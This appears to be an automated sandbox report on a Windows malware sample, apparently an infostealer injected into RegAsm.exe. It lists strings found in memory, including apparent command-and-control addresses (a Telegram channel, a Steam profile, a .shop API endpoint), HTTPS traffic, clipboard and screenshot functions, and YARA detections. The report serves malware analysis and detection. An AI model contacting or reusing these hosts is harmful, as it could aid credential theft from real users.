Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com/
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.comntent-Disposition:
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134269337.000000001D4AD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AKFIDH.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: AKFIDH.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AKFIDH.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AKFIDH.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: AKFIDH.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AKFIDH.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AKFIDH.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GHJKJD.2.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
Source: EBKJDB.2.dr	String found in binary or memory: https://support.mozilla.org
Source: EBKJDB.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EBKJDB.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunl
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunlsql.dllsqlr.dllIn
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000104D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/apibu
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: AKFIDH.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: AKFIDH.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00431530

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00431530

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FF05 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_0040FF05

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: KKJEBAAECB.exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: KJKJJJECFI.exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	2_2_6C0EED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C12B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12B8C0 rand_s,NtQueryVirtualMemory,	2_2_6C12B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	2_2_6C12B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C0CF280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013E0B44	0_2_013E0B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419CF9	2_2_00419CF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419333	2_2_00419333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417F83	2_2_00417F83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0C35A0	2_2_6C0C35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C105C10	2_2_6C105C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C112C10	2_2_6C112C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13AC00	2_2_6C13AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13542B	2_2_6C13542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D5440	2_2_6C0D5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13545C	2_2_6C13545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D6C80	2_2_6C0D6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1234A0	2_2_6C1234A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12C4A0	2_2_6C12C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D64C0	2_2_6C0D64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0ED4D0	2_2_6C0ED4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C106CF0	2_2_6C106CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CD4E0	2_2_6C0CD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DFD00	2_2_6C0DFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F0512	2_2_6C0F0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EED10	2_2_6C0EED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C100DD0	2_2_6C100DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1285F0	2_2_6C1285F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C107E10	2_2_6C107E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C115600	2_2_6C115600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C129E30	2_2_6C129E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C103E50	2_2_6C103E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E4640	2_2_6C0E4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E9E50	2_2_6C0E9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C112E4E	2_2_6C112E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C136E63	2_2_6C136E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CC670	2_2_6C0CC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12E680	2_2_6C12E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E5E90	2_2_6C0E5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C124EA0	2_2_6C124EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1376E3	2_2_6C1376E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CBEF0	2_2_6C0CBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DFEF0	2_2_6C0DFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C107710	2_2_6C107710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D9F00	2_2_6C0D9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1177A0	2_2_6C1177A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CDFE0	2_2_6C0CDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F6FF0	2_2_6C0F6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D7810	2_2_6C0D7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10B820	2_2_6C10B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C114820	2_2_6C114820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E8850	2_2_6C0E8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0ED850	2_2_6C0ED850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10F070	2_2_6C10F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F60A0	2_2_6C0F60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1350C7	2_2_6C1350C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EC0E0	2_2_6C0EC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1058E0	2_2_6C1058E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EA940	2_2_6C0EA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C11B970	2_2_6C11B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13B170	2_2_6C13B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DD960	2_2_6C0DD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C105190	2_2_6C105190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C122990	2_2_6C122990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CC9A0	2_2_6C0CC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FD9B0	2_2_6C0FD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C109A60	2_2_6C109A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13BA90	2_2_6C13BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C132AB0	2_2_6C132AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0C22A0	2_2_6C0C22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F4AA0	2_2_6C0F4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DCAB0	2_2_6C0DCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C108AC0	2_2_6C108AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10E2F0	2_2_6C10E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E1AF0	2_2_6C0E1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10D320	2_2_6C10D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0C5340	2_2_6C0C5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DC370	2_2_6C0DC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CF380	2_2_6C0CF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1353C8	2_2_6C1353C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24AC30	2_2_6C24AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C236C00	2_2_6C236C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C17AC60	2_2_6C17AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1CECD0	2_2_6C1CECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C16ECC0	2_2_6C16ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2F8D20	2_2_6C2F8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C23ED70	2_2_6C23ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C29AD50	2_2_6C29AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C174DB0	2_2_6C174DB0
